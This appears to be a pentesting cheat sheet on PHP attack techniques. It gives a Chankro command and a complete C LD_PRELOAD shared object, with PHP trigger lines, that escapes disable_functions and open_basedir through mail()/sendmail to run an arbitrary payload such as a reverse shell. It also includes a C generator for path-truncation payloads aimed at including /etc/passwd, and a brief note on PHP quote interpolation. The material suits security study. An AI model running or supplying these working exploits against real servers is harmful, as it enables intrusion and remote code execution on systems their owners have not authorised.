# PHP on Linux calls an external binary (sendmail) when the mail() function is executed.
# If putenv() is allowed, we can set the environment variable "LD_PRELOAD", so the sendmail
# process started by mail() preloads an arbitrary shared object. The constructor of our shared
# object runs our custom payload (a binary or a bash script) outside the PHP restrictions
# (disable_functions, open_basedir), so we can get a reverse shell, for example.
# Requirements: putenv() and mail() not disabled, sendmail present, and a writable directory
# for the .so and the payload.
# Chankro tool automates this (https://github.com/TarlogicSecurity/Chankro)
python2 chankro.py --arch 64 --input rev.sh --output chan.php --path /var/www/html
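The shared object that does the hijack, as an added example (this is not Chankro's own source, only the same technique written by hand). It assumes the .so and the payload are dropped in /var/www/html, that the PHP side sets a hypothetical variable HIJACK_PAYLOAD with the payload path (that name is chosen for this example), and that sendmail is started by mail() so the dynamic loader honours LD_PRELOAD:

```c
/* hijack.c: LD_PRELOAD object for the mail()/sendmail trick (added example, not Chankro's code).
 * Build:  gcc -shared -fPIC -o /var/www/html/hijack.so hijack.c
 * Trigger from PHP (assumed paths; HIJACK_PAYLOAD is a hypothetical name):
 *   <?php
 *   putenv("HIJACK_PAYLOAD=/var/www/html/rev.sh");
 *   putenv("LD_PRELOAD=/var/www/html/hijack.so");
 *   mail("a@example.com", "x", "y");   // spawns sendmail -> loader maps hijack.so first
 */
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Env var carrying the payload path (hypothetical name picked for this example). */
#define PAYLOAD_VAR "HIJACK_PAYLOAD"

/* Remove LD_PRELOAD so neither the payload nor anything it spawns (the reverse shell,
 * the binaries it runs) loads this object again. Returns 0 once the variable is gone. */
int drop_preload(void)
{
    unsetenv("LD_PRELOAD");
    return getenv("LD_PRELOAD") == NULL ? 0 : -1;
}

/* Payload path from the environment, or NULL if unset or not a regular file. */
const char *payload_path(void)
{
    const char *p = getenv(PAYLOAD_VAR);
    struct stat st;
    if (p == NULL || *p == '\0') return NULL;
    if (stat(p, &st) != 0 || !S_ISREG(st.st_mode)) return NULL;
    return p;
}

/* Runs when the loader maps this object into sendmail, before sendmail's own main(). */
__attribute__((constructor))
static void hijack(void)
{
    const char *p = payload_path();
    drop_preload();
    if (p == NULL) return;                 /* loaded somewhere unexpected: stay quiet */
    unsetenv(PAYLOAD_VAR);
    if (fork() == 0) {
        if (access(p, X_OK) == 0)
            execl(p, p, (char *)NULL);                 /* binary, or script with +x */
        else
            execl("/bin/sh", "sh", p, (char *)NULL);   /* script dropped without +x */
        _exit(127);
    }
    /* parent returns: sendmail continues normally, so mail() does not error out */
}
```

The constructor forks before exec so sendmail itself still runs and the PHP side sees a normal mail() return; dropping LD_PRELOAD first avoids every child of the payload re-running the hijack.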
MISC
# Path truncation
# PHP's maximum path length is 4096 characters (MAXPATHLEN on Linux).
# Old PHP versions (before 5.3) silently truncated longer paths, so a check on a file name
# (for example an extension the application appends) can be bypassed by flooding the path
# with "./" segments before the resource is requested, e.g.:
page=././././././././.......
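A model of the truncation described above, as an added example (not from the page): the vulnerable application is assumed to do include($_GET['page'] . ".php"), and the payload pads the target with "/." segments after the file name (rather than before it, as in the snippet above) so that no length tuning is needed: the total reaches MAXPATHLEN and the appended ".php" falls past the cut. The simulation only reproduces the truncation step of old PHP (before 5.3), which also normalised the "/." segments away before opening the file.

```c
/* Added example: PHP < 5.3 path truncation, modelled in C (not PHP's real code). */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PHP_MAXPATHLEN 4096   /* MAXPATHLEN on Linux, the limit the page refers to */

/* Build "<target>/./././..." so that strlen(result) >= PHP_MAXPATHLEN.
 * Returns a malloc'd string the caller frees, or NULL on allocation failure. */
char *build_truncation_payload(const char *target)
{
    size_t len = strlen(target);
    size_t pad = (len >= PHP_MAXPATHLEN) ? 0 : PHP_MAXPATHLEN - len;
    size_t units = (pad + 1) / 2;                 /* "/." is two chars; round up */
    char *buf = malloc(len + 2 * units + 1);
    if (!buf) return NULL;
    memcpy(buf, target, len);
    for (size_t i = 0; i < units; i++) {
        buf[len + 2 * i] = '/';
        buf[len + 2 * i + 1] = '.';
    }
    buf[len + 2 * units] = '\0';
    return buf;
}

/* What the vulnerable include did: append the suffix, then silently cut the path to
 * MAXPATHLEN-1 characters before opening it. Returns a malloc'd string or NULL. */
char *simulate_vulnerable_include(const char *page_param, const char *suffix)
{
    size_t n = strlen(page_param) + strlen(suffix);
    char *full = malloc(n + 1);
    if (!full) return NULL;
    strcpy(full, page_param);
    strcat(full, suffix);
    if (n > PHP_MAXPATHLEN - 1)
        full[PHP_MAXPATHLEN - 1] = '\0';          /* the appended suffix is lost here */
    return full;
}

/* Is the suffix the application tried to enforce still at the end of the path? */
int suffix_survives(const char *path, const char *suffix)
{
    size_t lp = strlen(path), ls = strlen(suffix);
    return lp >= ls && strcmp(path + lp - ls, suffix) == 0;
}

int main(void)
{
    char *payload = build_truncation_payload("/etc/passwd");   /* constructed sample target */
    char *opened  = simulate_vulnerable_include(payload, ".php");
    printf("payload length: %zu, opened path length: %zu, .php kept: %s\n",
           strlen(payload), strlen(opened), suffix_survives(opened, ".php") ? "yes" : "no");
    free(payload);
    free(opened);
    return 0;
}
```

On current PHP the same input is not truncated and the include fails on the ".php" suffix, which is the quick way to confirm the target is not vulnerable before spending time on the padding.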
# There is a BIG difference between "$salt" and '$salt'.
# Double quotes → the variable is interpolated ("abc$salt" is abc followed by the value of $salt)
# Single quotes → a literal string, no interpolation ('abc$salt' is exactly the text abc$salt)